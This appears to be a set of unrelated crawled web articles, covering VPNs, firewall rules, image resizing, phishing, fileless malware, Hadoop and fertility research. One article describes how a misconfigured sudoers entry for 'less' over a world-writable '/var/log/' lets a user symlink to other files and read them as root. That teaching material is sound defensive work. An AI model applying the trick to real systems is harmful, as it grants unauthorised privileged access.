One increasingly popular way that businesses, local governments, and even private citizens are strengthening their data security and privacy is by using a VPN, or virtual private network. This is a great option for many types of organizations to safely and privately surf the web and protect valuable data. But some may be confused about VPNs–after all, how does a virtual private network really work, anyway? We’ve got you covered with some of the basics about virtual private networks and how they can benefit your business or organization by ensuring better network security and privacy.
Using a VPN is a great way to browse the Internet privately, which makes it a great option for anyone looking to protect their data, IP address, and even locations. Thanks to encryption, a VPN will conceal your real IP address so you can browse anonymously, and actually use a different IP address entirely. This makes it a great feature not just for privacy, but also for cybersecurity. A virtual private network also allows you to send data safely over public WiFi, which is what makes it such a popular choice for businesses, especially ones that utilize remote employees. With a VPN, you can be sure that your most sensitive data is protected–even on a public WiFi network.
The primary reason that so many businesses and organizations rely on virtual private networks is cybersecurity. No matter what kind of data your organization needs to protect, a virtual private network is a key way you can ensure it is protected at all times–even when traveling. Many hackers will use simple methods such as WiFi spoofing to hack networks and access sensitive information. Keep your data protected and your network secure by relying on a virtual private network. VPNs are an important part of any well-rounded network security plan.
Setting Up a VPN
While a VPN protects your data using encryption and sophisticated tunneling techniques, the actual installation of a virtual private network is actually pretty straightforward. In fact, it can be as simple as entering a username and server address. Many large corporations and organizations rely on these networks for secure data transfer, privacy, and encryption. Prioritize your data and network security today by incorporating a virtual private network into your network security protocol.
En-Net Services Can Help Today
Experience a superior method of getting the public sector technology solutions you need through forming a partnership with En-Net Services. Our seasoned team members are familiar with the distinct purchasing and procurement cycles of state and local governments, as well as Federal, K-12 education, and higher education entities. En-Net is a certified Maryland Small Business Reserve with contract vehicles and sub-contracting partnerships to meet all contracting requirements.
To find out more about our hardware services, printing, and imaging services, or to hear more about how a dynamic team can help meet your information technology needs, send us an email or give us a call at (301)-846-9901 today! | <urn:uuid:62de627f-93bf-4b04-87be-9101d7f5d354> | CC-MAIN-2022-40 | https://www.en-netservices.com/blog/learning-more-about-virtual-private-networks/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334871.54/warc/CC-MAIN-20220926113251-20220926143251-00166.warc.gz | en | 0.941476 | 584 | 2.859375 | 3 |
The table in this post shows the firewall rules solution to meet the requirements in the “Firewall Rules” post. Additionally, the following list provides explanations for each of these requirements. For clarity, the rules are restated right before the explanation:
- Allow all HTTP traffic to a web server with an IP of 192.168.1.25.
Note that while HTTP traffic typically uses TCP, it can also use UDP. Because of this IP is used instead of TCP or UDP.
- Allow all HTTP and HTTPS traffic to a web server with an IP of 192.168.1.25.
This requires two rules. One rule allows HTTP traffic by allowing port 80, and the second rule allows HTTPS traffic by allowing port 443.
- Allow DNS queries from any source to a computer with an IP of 192.168.1.10.
DNS name resolution queries use UDP port 53.
- Block DNS zone transfer traffic from any source to any destination.
DNS zone transfers use TCP port 53.
- Block all DNS traffic from any source to any destination.
Using IP blocks both DNS name resolution queries on UDP port 53 and DNS zone transfers on TCP port 53. You could also implement this was two separate rules with one for UDP and one for TCP.
- Implement implicit deny.
The implicit deny rule is always placed last and it blocks any type of traffic from any source to any destination using any port. Note that you could also have omitted rules 4 and 5 and placed the implicit deny rule after rule 3. It would still have met the requirements but wouldn’t have stressed the difference between TCP port 53 and UDP port 53.
Table: Firewall rules
Page 3 Firewall Rules Solution (this page) | <urn:uuid:2eef9cd6-5932-4993-9983-2dd04dc758d7> | CC-MAIN-2022-40 | https://blogs.getcertifiedgetahead.com/firewall-rules-solution/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335304.71/warc/CC-MAIN-20220929034214-20220929064214-00166.warc.gz | en | 0.891855 | 359 | 2.625 | 3 |
In a recent post, we talked about the various image formats you should use when sharing images over email or online. The goal is to generate an image (or images) that are the smallest file size possible to make them easy to share and quick to download, without reducing the overall quality of the image.
How to Resize and Optimize an Image for the Web
For this example, we’re going to be using Adobe Photoshop. For the longest time, Adobe Photoshop has been the top-shelf application for image editing. There are plenty of other applications out there that can do basic edits like resizing and compressing images, and if you are more familiar with another application that is similar to Photoshop, you might be able to follow along and get the general idea of what to do.
Let’s say we have a large photo of a coffee shop that we want to put on our website. Here’s what it looks like loaded in Photoshop:
Notice the percentage next to the file name? In our example, it says 16.7%.
This means we are zoomed out to the degree where the image can only possibly display 16.7 percent of the pixels.
This doesn’t mean that some of the pixels are off-screen—Photoshop isn’t being nitpicky about that. It’s telling you that your image is zoomed out so that your computer monitor isn’t displaying all of the detail in the image.
You can zoom in and out in Photoshop a few different ways. The easiest way is to hold down CTRL and Spacebar and left-click to Zoom In and hold down CTRL, Alt, and Spacebar while left-clicking to Zoom Out.
Here’s the same image at a 100% Zoom.
As you can see, we only see a small portion of the image now that we’re looking at the image at 100 percent zoom.
What Does This Tell Us?
This image is big!
It’s important to remember that by zooming, we didn’t change the size of the image. We just changed the percentage of pixels of the image our monitor is displaying. At this zoom level, for this particular image, the image itself scales past the confines of our monitor.
This isn’t a bad thing. This means we’re working with a high quality image. There’s a lot of potential there. We could print this image and it will likely come out sharp and crisp with lots of detail. However, if we were to put this on a website, as is, it’s going to be massive. It will be larger than most users’ screens will be able to display.
It’s much bigger than it needs to be, once the web is concerned.
Most stock images you purchase, and most photos that come off of a modern smartphone camera or digital camera are going to be massive, as far as their dimensions go.
One important thing you need to remember before we continue—you should only shrink images down. Taking a small image and blowing it up usually requires a graphic designer, if it’s possible at all. Otherwise you’ll lose a lot of image quality.
Oh yeah, and save an original copy! We mentioned this in the last blog, but it’s worth mentioning again!
Step 1 – Determine the Size That You Need
This step can be tricky unless you have a bit of a background in graphic design. For your website, it’s going to depend on where the image is going. You may need to eyeball it, guesstimate, or even do some trial and error. There’s a pretty neat trick you can do with the Firefox browser, if you are replacing an image that’s already there.
- Load up Firefox and navigate to the page you want to put the new image.
- Right-click the image you want to replace and go to View Image Info.
- A window will pop up displaying your image and some information about it.
- Look for Dimensions. That will show you the width and height of the image in pixels.
- You can use that as a reference for the new image.
It’s also about eyeballing it. Here are some sizes you can use as a point of reference.
- 3840px is the width of a 4k Ultra HD monitor or television screen.
- 1920px is the width of a standard high definition monitor or television screen.
- 1080px is the width of most Instagram images.
- 820px is the width of a Facebook Cover Image on a desktop or most laptops.
- 272px is the width of Google’s logo in the center of Google.com on most desktops and laptops.
Here are some square images so you can get an idea of their size. Keep in mind, if you are viewing this blog on your smartphone, the sizes are going to vary a little, since our website will scale down to fit your smartphone screen. For best results, pull this blog up on your desktop.
Hopefully these references will help you out.
Step 2 – Zoom to 100% in Photoshop
In the bottom left corner of Photoshop, below your image, you’ll see the Zoom percentage. Click the percentage and set it to 100%. You can also manipulate this by Zooming In by holding down CTRL and Spacebar while left-clicking the image and Zooming Out by holding down CTRL, ALT, and Spacebar while left-clicking the image.
We’re doing this to ensure that we get a good visual example of how large or small the image is when we’re done. If you are zoomed in or out, Photoshop won’t display the image at the correct size for you. This makes it easier when you are estimating the size.
Step 3 – Resize Your Image
Click on the Image Menu and go to Image Size.
You should see this window:
While in the Image Size window:
- Make sure that the Width and Height are set to Pixels (as opposed to inches, centimeters, etc.)
- Also, make sure the brackets next to the link icon (pointing at Width and Height) are on. Clicking on the link icon will toggle this. This will ensure that you keep the same proportions of the image while you resize it.
- Type in the new width or height you want to shrink the image down to. If you change one field, the other should change with it.
- Typically, leaving Resample checked, and keeping it on Automatic will be your best bet.
- Click OK to resize your image.
Of course, if you are a graphic designer and you’ve been working in Photoshop for years, you’ll probably have your own process for doing this. We’re trying to make it as easy as possible for the average user.
Step 4 – Save Your Resized Image
Finally, it’s time to save the image.
In our last blog, we talked about the various image formats you should consider. Since we’re working with a photograph, the best format to use is JPEG.
In Photoshop, go to File > Export > Export As.
The Export As window should appear:
This will give you a preview of your image. Use the + and – icons at the bottom center to zoom in to your image to 100 percent.
On the right, under File Settings, make sure your Format is set to JPG.
Set the Quality Option by dragging the slider to the left. You’ll want to carefully examine the preview as you move the slider. If you start to notice the image degrade in quality, stop, and nudge the slider to the right.
Every image is going to be a little different, but most of the time, you should be able to set the quality somewhere between 40-and-70 percent without degrading the actual quality of the image.
This is important. That quality slider is what determines the file size of the image. Users will be able to download the image faster if the file size is as low as possible, but going too low will cause the image to look over-compressed.
The best place to look in your image for degradation is where high-contrast colors connect. Look for light and dark objects. If you lower the quality too far, you’ll start to see weird artifacting and shapes start to appear around hard edges.
Once you are ready, click Export and you’ll be prompted to give your new image a file name. Just make sure you don’t save over the original!
We hope this guide helped! For more tips and tricks, keep coming back to our blog. If you need technical support, be sure to give us a call at (610) 828- 5500! | <urn:uuid:b8a58b1a-370e-4bd8-9519-f9386f5dcb5a> | CC-MAIN-2022-40 | https://ctnsolutions.com/working-with-images-on-the-web-part-2-resizing-images/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335304.71/warc/CC-MAIN-20220929034214-20220929064214-00166.warc.gz | en | 0.916885 | 1,855 | 2.828125 | 3 |
Noise and Crosstalk over Copper
Copper susceptibility to interference and noises has been a major factor limiting the performance that can be extracted out of it over the years. These interferences wrapping around the transmitted data, if not mitigated, can have high impact on the link reliability, the throughput of the services riding over it, and the coverage that can be achieved.
Electromagnetic interference (EMI) and cross talk are two common sources of noises within a copper environment. EMI occurs when electrical signals from the local environment outside of the binder are picked up by the copper pairs in a cable and introduce noise. Crosstalk occurs when a signal transmitted on one copper twisted pair in a bundle radiates and potentially interferes with and degrades the transmission on another pair. There are different types of cross talk as can be seen from the diagram below.
Advanced technologies that can effectively manage and mitigate these kinds of interferences can enable carriers to significantly increase the utilization of their copper pairs to deliver higher services to longer distances with carrier class reliability.
Learn More : Overcoming Cross Talk | <urn:uuid:a94518d2-5a62-4e40-8f5e-fc6a39ccfbe4> | CC-MAIN-2022-40 | https://actelis.com/technology-2/copper-broadband-technologies/cross-talk/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335469.40/warc/CC-MAIN-20220930113830-20220930143830-00166.warc.gz | en | 0.926705 | 222 | 3.1875 | 3 |
One way or another, we all have almost fallen victim to shrouded scams or corrupt sites. They appear legitimate with a valid IP address. What’s the worst that could happen?
Google phishing scams are major corrupt sites that send fraudulent messages which appear to be from a legitimate source.
It is a punishable cybercrime that seeks to exploit personal data from any device or site. They leverage such authority to penetrate any data.
Attackers use different routes to spin their targets. However, the most common form of phishing is through emails. We all fall victim to spam emails, and you wonder how such sites could locate your email address.
Such emails masquerade as a corporate company. The scammers send emails concerning security alerts to pry into the log-in information or spy on their targets.
The most inconsistent locations are their key sources. For example, it may appear as a duplicate message from your bank or a notification message from an app.
The email often comes from a known sender asking permission to share a document.
In 2017, a major malicious plaque hit the internet. A duplicate site of Google was created, and the malicious site sent emails to almost every Gmail user asking permission to share a document.
One of the reasons the scam was quite believable was because it was posted directly on Google’s server. Thus, the URL appeared normal, but in reality, it’s a third-party site penetrating Google’s original server.
The plot was so well-crafted that many users fell for the scam. After logging in their details, the scammers had access to their personal information, including bank statements and passwords.
After an hour of wrecking havoc, the Google team could reverse the disruptive channel. It left users wondering how a highly secured site could easily lapse in security measures.
The message might state that there has been a data breach. Afterward, they ask for a log-in detail or request filling a form.
Such messages are from corrupt sources and only wish to source out data. These scammers often sought out credit card details from a single log-in.
Below are easy ways to prevent scammers from gaining access to your data;
Most times, malicious sites have wrong spellings, and the tone of speech sounds corrupted. The web address might be misspelled. They use letters and numbers. If in doubt, copy and paste the page into a search engine to validate its authenticity.
Check the connection
Credible sites often start with “https.” This proves that it’s from a secure network. If you notice they’re in capital letters or a letter is missing, you’re likely encountering a phishing website.
Regularly Update Web Browser
Updating your browser often builds an extra firewall against such sites. They protect your data and right in cases of cyber crimes.
Don’t click on every attachment or link
Beware of links and attachments. Particularly when sent from an unidentified source in your email. Make sure the email or link is from a legitimate source before clicking.
Google phishing scams are damaging people’s data globally. Still, there are ways you can protect yourself from this damage, including checking a site’s spell and connection and avoiding clicking on every attachment link. | <urn:uuid:19a62899-07de-4c39-99f1-283bf9ac804c> | CC-MAIN-2022-40 | https://www.getsecuretech.com/how-do-google-phishing-scams-work/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336921.76/warc/CC-MAIN-20221001195125-20221001225125-00166.warc.gz | en | 0.931863 | 683 | 2.84375 | 3 |
The following article describes common security issues regarding misconfigured sudoers’ files. The article focuses on a single entry which contains several security issues:
hacker10 ALL= (root) /bin/less /var/log/*
The article is split into the following five chapters:
- PART 1: Command Execution
- PART 2: Insecure Functionality
- PART 3: Permissions
- PART 4: Wildcards
- PART 5: Recapitulation
Another pitfall of securing “sudo” commands are the file system permissions. If the permissions aren’t set correctly, an attacker might circumvent the restrictions we have implemented during the last two blog posts. For the next example the administrator changed the directory permissions for the directory “/var/log/” to “777”. Obviously, this is a bad idea for this directory and a almost unrealistic scenario. None the less, this situation might appear if we use an application specific directory which has been configured manually.
Because of the write permissions in this directory we are allowed to create arbitrary files in it. This allows us to create links to files residing in other directories. This will grant us access to the linked file once we use “less” as user root:
“less” shows us the following content when the previous command is executed:
Furthermore, ensure that the user has no write permissions on the executable.
The only solution to this issue is setting appropriate permissions on the file system! | <urn:uuid:ca2625db-c1b6-47aa-ad30-c0c8241cc8dc> | CC-MAIN-2022-40 | https://blog.compass-security.com/2012/10/dangerous-sudoers-entries-part-3-permissions/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337668.62/warc/CC-MAIN-20221005203530-20221005233530-00166.warc.gz | en | 0.885196 | 311 | 2.53125 | 3 |
Hadoop ecosystem overview
Remember that Hadoop is a framework. If Hadoop was a house, it wouldn’t be a very comfortable place to live. It would provide walls, windows, doors, pipes, and wires. The Hadoop ecosystem provides the furnishings that turn the framework into a comfortable home for big data activity that reflects your specific needs and tastes.
The Hadoop ecosystem includes both official Apache open source projects and a wide range of commercial tools and solutions. Some of the best-known open source examples include Spark, Hive, Pig, Oozie and Sqoop. Commercial Hadoop offerings are even more diverse and include platforms and packaged distributions from vendors such as Cloudera, Hortonworks, and MapR, plus a variety of tools for specific Hadoop development, production, and maintenance tasks.
Most of the solutions available in the Hadoop ecosystem are intended to supplement one or two of Hadoop’s four core elements (HDFS, MapReduce, YARN, and Common). However, the commercially available framework solutions provide more comprehensive functionality. The sections below provide a closer look at some of the more prominent components of the Hadoop ecosystem, starting with the Apache projects
(This article is part of our Hadoop Guide. Use the right-hand menu to navigate.)
Apache open source Hadoop ecosystem elements
The Apache Hadoop project actively supports multiple projects intended to extend Hadoop’s capabilities and make it easier to use. There are several top-level projects to create development tools as well as for managing Hadoop data flow and processing. Many commercial third-party solutions build on the technologies developed within the Apache Hadoop ecosystem.
Spark, Pig, and Hive are three of the best-known Apache Hadoop projects. Each is used to create applications to process Hadoop data. While there are a lot of articles and discussions about whether Spark, Hive or Pig is better, in practice many organizations do not only use a single one because each is optimized for specific functions.
Spark is both a programming model and a computing model. It provides a gateway to in-memory computing for Hadoop, which is a big reason for its popularity and wide adoption. Spark provides an alternative to MapReduce that enables workloads to execute in memory, instead of on disk. Spark accesses data from HDFS but bypasses the MapReduce processing framework, and thus eliminates the resource-intensive disk operations that MapReduce requires. By using in-memory computing, Spark workloads typically run between 10 and 100 times faster compared to disk execution.
Spark can be used independently of Hadoop. However, it is used most commonly with Hadoop as an alternative to MapReduce for data processing. Spark can easily coexist with MapReduce and with other ecosystem components that perform other tasks.
Spark is also popular because it supports SQL, which helps overcome a shortcoming in core Hadoop technology. The Spark programming environment works interactively with Scala, Python, and R shells. It has been used for data extract/transform/load (ETL) operations, stream processing, machine learning development and with the Apache GraphX API for graph computation and display. Spark can run on a variety of Hadoop and non-Hadoop clusters, including Amazon S3.
Hive is data warehousing software that addresses how data is structured and queried in distributed Hadoop clusters. Hive is also a popular development environment that is used to write queries for data in the Hadoop environment. It provides tools for ETL operations and brings some SQL-like capabilities to the environment. Hive is a declarative language that is used to develop applications for the Hadoop environment, however it does not support real-time queries.
Hive has several components, including:
- HCatalog – Helps data processing tools read and write data on the grid. It supports MapReduce and Pig.
- WebHCat – Lets you use an HTTP/REST interface to run MapReduce, Yarn, Pig, and Hive jobs.
- HiveQL – Hive’s query language intended as a way for SQL developers to easily work in Hadoop. It is similar to SQL and helps both structure and query data in distributed Hadoop clusters.
Hive queries can run from the Hive shell, JDBC, or ODBC. MapReduce (or an alternative) breaks down HiveQL statements for execution across the cluster.
Hive also allows MapReduce-compatible mapping and reduction software to perform more sophisticated functions. However, Hive does not allow row-level updates or support for real-time queries, and it is not intended for OLTP workloads. Many consider Hive to be much more effective for processing structured data than unstructured data, for which Pig is considered advantageous.
Pig is a procedural language for developing parallel processing applications for large data sets in the Hadoop environment. Pig is an alternative to Java programming for MapReduce, and automatically generates MapReduce functions. Pig includes Pig Latin, which is a scripting language. Pig translates Pig Latin scripts into MapReduce, which can then run on YARN and process data in the HDFS cluster. Pig is popular because it automates some of the complexity in MapReduce development.
Pig is commonly used for complex use cases that require multiple data operations. It is more of a processing language than a query language. Pig helps develop applications that aggregate and sort data and supports multiple inputs and exports. It is highly customizable, because users can write their own functions using their preferred scripting language. Ruby, Python and even Java are all supported. Thus, Pig has been a popular option for developers that are familiar with those languages but not with MapReduce. However, SQL developers may find Hive easier to learn.
HBase is a scalable, distributed, NoSQL database that sits atop the HFDS. It was designed to store structured data in tables that could have billions of rows and millions of columns. It has been deployed to power historical searches through large data sets, especially when the desired data is contained within a large amount of unimportant or irrelevant data (also known as sparse data sets). It is also an underlying technology behind several large messaging applications, including Facebook’s.
HBase is not a relational database and wasn’t designed to support transactional and other real-time applications. It is accessible through a Java API and has ODBC and JDBC drivers. HBase does not support SQL queries, however there are several SQL support tools available from the Apache project and from software vendors. For example, Hive can be used to run SQL-like queries in HBase.
Oozie is the workflow scheduler that was developed as part of the Apache Hadoop project. It manages how workflows start and execute, and also controls the execution path. Oozie is a server-based Java web application that uses workflow definitions written in hPDL, which is an XML Process Definition Language similar to JBOSS JBPM jPDL. Oozie only supports specific workflow types, so other workload schedulers are commonly used instead of or in addition to Oozie in Hadoop environments.
Think of Sqoop as a front-end loader for big data. Sqoop is a command-line interface that facilitates moving bulk data from Hadoop into relational databases and other structured data stores. Using Sqoop replaces the need to develop scripts to export and import data. One common use case is to move data from an enterprise data warehouse to a Hadoop cluster for ETL processing. Performing ETL on the commodity Hadoop cluster is resource efficient, while Sqoop provides a practical transfer method.
Other Apache Hadoop-related open source projects
Here is how the Apache organization describes some of the other components in its Hadoop ecosystem.
- Ambari – A web-based tool for provisioning, managing, and monitoring Apache Hadoop clusters which includes support for Hadoop HDFS, Hadoop MapReduce, Hive, HCatalog, HBase, ZooKeeper, Oozie, Pig, and Sqoop.
- Avro – A data serialization system.
- Cassandra – A scalable multi-master database with no single points of failure.
- Chukwa – A data collection system for managing large distributed systems.
- Impala – The open source, native analytic database for Apache Hadoop. Impala is shipped by Cloudera, MapR, Oracle, and Amazon.
- Flume – A distributed, reliable, and available service for efficiently collecting, aggregating, and moving large amounts of streaming event data.
- Kafka – A messaging broker that is often used in place of traditional brokers in the Hadoop environment because it is designed for higher throughput and provides replication and greater fault tolerance.
- Mahout – A scalable machine learning and data mining library.
- Tajo – A robust big data relational and distributed data warehouse system for Apache Hadoop. Tajo is designed for low-latency and scalable ad-hoc queries, online aggregation, and ETL on large-data sets stored on HDFS and other data sources. By supporting SQL standards and leveraging advanced database techniques, Tajo allows direct control of distributed execution and data flow across a variety of query evaluation strategies and optimization opportunities.
- Tez – A generalized data-flow programming framework, built on Hadoop YARN, which provides a powerful and flexible engine to execute an arbitrary DAG of tasks to process data for both batch and interactive use-cases. Tez is being adopted by Hive, Pig and other frameworks in the Hadoop ecosystem, and also by other commercial software (e.g. ETL tools), to replace MapReduce as the underlying execution engine.
- Zookeper – A high-performance coordination service for distributed applications.
The ecosystem elements described above are all open source Apache Hadoop projects. There are numerous commercial solutions that use or support the open source Hadoop projects. Some of the more prominent ones are described in the following sections.
Commercial Hadoop distributions
Hadoop can be downloaded from www.hadoop.apache.org and used for free, which thousands of organizations have done. There are also commercial distributions that combine core Hadoop technology with additional features, functionality and documentation. The leading commercial distribution Hadoop vendors include Cloudera, Hortonworks, and MapR. There are also many more less comprehensive, more task-specific tools for the Hadoop environment, such as developer tools and job schedulers. | <urn:uuid:eb34e4a1-7dd8-415d-b5ca-d5eafa19abd8> | CC-MAIN-2022-40 | https://www.bmc.com/blogs/hadoop-ecosystem/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334912.28/warc/CC-MAIN-20220926144455-20220926174455-00366.warc.gz | en | 0.919883 | 2,239 | 2.765625 | 3 |
The study assessed allostatic load, which refers to the cumulative “wear and tear” of chronic stress and life events, in 444 women who were trying to become pregnant.
Women with higher allostatic load scores – based on nine indicators such as blood pressure, blood sugar, cortisol, noradrenaline, and cholesterol – were less likely to become pregnant within a year.
Allostatic load (AL) is a practical index that reflects multi-system physiological changes which occur in response to chronic psychosocial stress. This study investigated the association between female pre-pregnancy allostatic load and time to pregnancy.
For example, the women with an allostatic load score of 5-6 would have a 59% reduction of fecundability compared with those with scores of 0.
“What we found provides a new idea for preconception counseling. But obviously, how to objectively assess the stress is a complex scientific question, and how to intervene and reduce the impact of chronic stress is a burning problem, which are all things we need to study further,” said senior author Bei Wang, PhD, of Southeast University in Jiangsu, China.
Infertility affects around one in every six couples of reproductive age globally and more than 25 million inhabitants of the European Union (EU) . The World Health Organization (WHO) acknowledges that despite the high frequency of infertility, the majority of infertile women remain silent about their experience, increasing their psychological fragility. Natural infertility may result in emotions of shame, remorse, and poor self-esteem.
These negative emotions might manifest as despair, worry, discomfort, and a low quality of life in varied degrees [2,3]. Other studies report infertility as causing depression comparable to cancer and other life-threatening diseases . On top of the negative psychological ef- fects, infertility still causes stigmatization in couples that are unable to conceive, including the pressuring families and social pressure of peers, disturbing the quality of life, social position, and causing serious relationship tension [5,6].
Existing research indicates that infertility has a greater impact on women than on males, with some women becoming victims of spousal abuse, economic distress, and social isolation . It was observed in Europe that couples seeking assisted reproductive therapy (ART) are more likely to have a higher socioeconomic status than the general population , since couples from this category often elect to have children later in life, after achieving career goals .
Options regarding infertility treatment vary nowadays by complexity, success rates, and, consequently, their costs. Assisted reproductive therapy (ART) in Romania has evolved extensively during the past two decades, offering a range of procedures, including in-vitro fertilization (IFV) and embryo transfer, intracytoplasmic sperm injection (ICSI), gamete intrafallopian transfer, zygote intrafallopian transfer, tubal embryo transfer, gamete and embryo cryopreservation, oocyte and embryo donation, and gestational surrogacy [10,11]. It is estimated that at least 8 million babies have been born through these assisted techniques since the first successful attempt , although the numbers in Romania remain unclear since most of them are performed in private practices.
Even though modern and expensive reproductive methods offer a statistically higher rate of success, several modifiable and unmodifiable factors are known to influence or might influence these numbers. While some lifestyle factors, such as cigarette smoking, illicit drug use, and alcohol and caffeine consumption, can be detrimental to female fertility, others, such as preventative care, can be favorable. Among the strongest impact factors on fertility as described by the scientific literature are the patient BMI, stress exposure, abnormal reproductive organ anatomy, and delayed childbearing age of starting a family, the latter two being unmodifiable [13,14].
Women experiencing infertility overwhelmingly believe that stress plays a role in their failure to conceive , and those who seek ART are particularly worried that stress may lower their chances of getting pregnant [16,17]. Multiple mechanisms by which the stress exposure and depression may influence female fertility were suggested; however, populational studies on fertility with this main goal are scarce .
This has resulted in imprecise conclusions about the effect of depression on infertility [4,19], although several published studies have indicated that infertile women receiving fertility treatment experience higher levels of stress and a higher prevalence of depression and anxiety than the general population [20,21]. Additionally, these symptoms are more prevalent in individuals who have had many IVF rounds after unsuccessful efforts [22,23].
In light of the aforementioned information, we sought to address the stress and financial factors that are most prevalent in Romania, and represent a susceptible reason for impeding access of infertile couples to assisted reproductive treatment in our country.
Original Research: Open access.
“Female fecundability is associated with pre-pregnancy allostatic load” by Bei Wang et al. Acta Obstetricia Et Gynecologica Scandinavica | <urn:uuid:e404367b-a6b0-46d5-a5bd-494e99aa02eb> | CC-MAIN-2022-40 | https://debuglies.com/2022/09/21/stress-can-reduce-a-womans-ability-to-become-pregnant-during-her-menstrual-cycle/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.31/warc/CC-MAIN-20220927225413-20220928015413-00366.warc.gz | en | 0.94708 | 1,034 | 2.71875 | 3 |
Fileless malware uses a computer system’s built-in tools to execute a cyberattack. In other words, fileless malware takes advantage of the vulnerabilities present in installed software to facilitate an attack. This type of malware does not require the attacker to sneak malicious code onto a potential victim’s system’s hard drive to be successful. Therefore, fileless malware can be extremely hard to detect—and extremely dangerous.
This blog will outline the basics of what fileless malware is along with the stages of an attack, the common techniques used by cybercriminals employing fileless malware, and tips for detecting these types of threats.
Fileless malware is a threat that doesn’t exist on disk. Typically, when malware is on disk—what I mean by on disk, is malware loaded onto a machine’s SSD (solid state drive) or hard drive—and it physically exists, it’s much easier to detect by security software. Also, it can be examined by security researchers, especially if it’s a complex threat.
Obviously, attackers don’t want their malware to be analyzed by defenders, who would then be better able to defend by reverse engineering the malware. So, the best way for the bad guys to keep their fileless malware effective and not have it analyzed is to make sure it’s not on disk. Hence, the rise of fileless malware.
Naturally, your next question about fileless malware is “Where in the world does it exist if it’s not on disk?” Basically, it exists in memory. Over the years, sophisticated attackers have used a variety of techniques to inject memory with their vilest malware.
Frodo and The Dark Avenger are early examples of fileless malware. Frodo was created in 1989 and was initially mean to be “a harmless prank.” Eventually, it that was exploited. That same year, The Dark Avenger was also discovered. It’s a type of attack that was used to infect executable files every time they were run on an infected computer. Even the copied files would get infected.
Today, fileless malware has become so advanced that the code they inject in memory executes and downloads new code in memory. Fileless malware does not require files to launch, however, it does need to modify the native environment and tools that it tries to attack. This is a much more advanced way of using fileless malware.
Using this technique to execute makes it very difficult for security software to figure out what the fileless malware is executing because there’s so many things happening in memory—so many normal operations that are being run—that it’s complex and hard to examine and get a handle on what’s happening. Security solutions simply can’t get a baseline on whether something malicious is occurring or not. This is what makes fileless malware very effective.
We are seeing more than in the recent past, but one of the downsides for attackers trying to use fileless malware is that it is more complicated than traditional malware. To create and execute fileless malware, attackers require a higher level of skills. This is why when you do see fileless malware attacks, they are typically associated with state-sponsored threats or the most sophisticated cybercriminals.
To get the same capabilities and features that traditional malware have, fileless malware requires creators with strong skill sets. The challenge for them is that there’s limited space in a device’s memory and they don't have much disk space to work with. The malware in memory can only reside in an existing memory space that's already limited in functionality.
Fileless malware is not only difficult to execute, but attackers must find a place in memory for it. And this must work quickly because fileless malware is flushed from memory when the system is rebooted. To be effective, fileless malware attackers need the right set of circumstances.
Like a traditional malware attack, the typical stages of a fileless malware attack are:
Cybercriminals that use fileless malware need to access the system in order to modify the native tools and launch attacks. Currently, stolen credentials are still the most common technique that attackers use to gain access.
Anytime you hear about credentials being stolen or usernames being hacked or credit card information being lifted, I wouldn't be surprised if there's at least some component of fileless malware involved.
Once fileless malware has gained access to a system, it can begin launching traditional malware. The techniques listed below tend to be more successful when combined with fileless malware:
The best way to detect and defeat fileless malware attacks is to have a holistic approach with a multi-layered defense posture. An organization’s best practices for detecting fileless malware threats should include employing indicators of attack (IOAs) along with indicators of compromise (IOCs) and leveraging their security solution’s threat hunting capabilities.
Because fileless malware uses a system’s built-in tools to facilitate attacks and cover its tracks, cybersecurity teams must be aware, remain vigilant, and know the different methods attackers employ in carrying out these fileless malware attacks. It’s all about gaining visibility on cybercriminals that are trying hard to hide in a system’s memory. | <urn:uuid:4cc5acf8-376f-4ca6-93c8-3ce81338cd12> | CC-MAIN-2022-40 | https://www.fortinet.com/blog/industry-trends/fileless-malware-what-it-is-and-how-it-works | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.31/warc/CC-MAIN-20220927225413-20220928015413-00366.warc.gz | en | 0.943216 | 1,092 | 2.890625 | 3 |
If your enterprise is considering Hadoop to help handle your big data workload, you’re in good company. Many organizations are exploring the use of this software to manage large amounts of data and more complex queries.
Hadoop has grown in popularity as big data has spurred the evolution of platforms capable of handling its large demands. Tools have evolved from simple tool sets to complete platforms. Large systems integrators and tech titans such as IBM have embraced the open source movement, making it more available and accessible to customers who are choosing how to implement big data for their enterprises.
Benefits of Using Hadoop
A few of the benefits of using Hadoop in your project include:
Traditionally, IT was completely responsible for all development. And if the business didn’t communicate its needs clearly to IT, or IT didn’t listen carefully, what they developed was not always what the business really needed or wanted. But with Hadoop, businesspeople – those who truly understand what their goals are and how the data can be used – are becoming far more involved in the process.
Because the big data platform capabilities are expanding, the emphasis on programming has decreased. As applications become more automated, less technical skill is needed to use them. The process is mirroring what happened with data warehousing and business intelligence (BI), where coding knowledge was necessary at first, but then vendors developed data integration and BI tools, which were much simpler and intuitive to use.
Frequently, the businesspeople tasked with working with Hadoop are called data scientists. This is an often-misunderstood job title. Some perceive that the data scientist is a coder, but in fact, it is someone whose main focus is the business. This is someone who really understands the business, its goals and what it needs to do with its data.
In the past, working with tools meant working with code. But now, the expertise data scientists must have is more in the area of developing predictive models and econometrics. The data models may have over 1,000 variables, so being able to predict customer behavior is more important than programming. In fact, for this role, a psychology major is going to have a better background than a computer science major.
The role of the business analyst is shifting as well. While the role used to require knowledge such as developing statistical programs, business analysts can now use data visualization and data discovery tools to interpret and make decisions based on their data.
The Data Difference
One of the problems in a big data initiative happens when people don’t understand that there is a variety of data and many different ways to manage that data – one size does not fit all.
Previously, people thought that data warehouses (DW) and relational databases could handle all of their needs. But then we started seeing unstructured data (like the content of emails and tweets), which didn’t fit in well with the structure or lend itself to a SQL query, no matter how complex. Now, people are deciding that everything needs to go into a Hadoop platform (or Hive or another comparable platform). The reality, however, is that data comes in all shapes and sizes. Some you need in real time, some you can wait for. Think of data in terms of the three Vs: different volumes, varieties and velocity. With this in mind, you can see that some data belongs in traditional databases, while other data is better suited to Hadoop platforms.
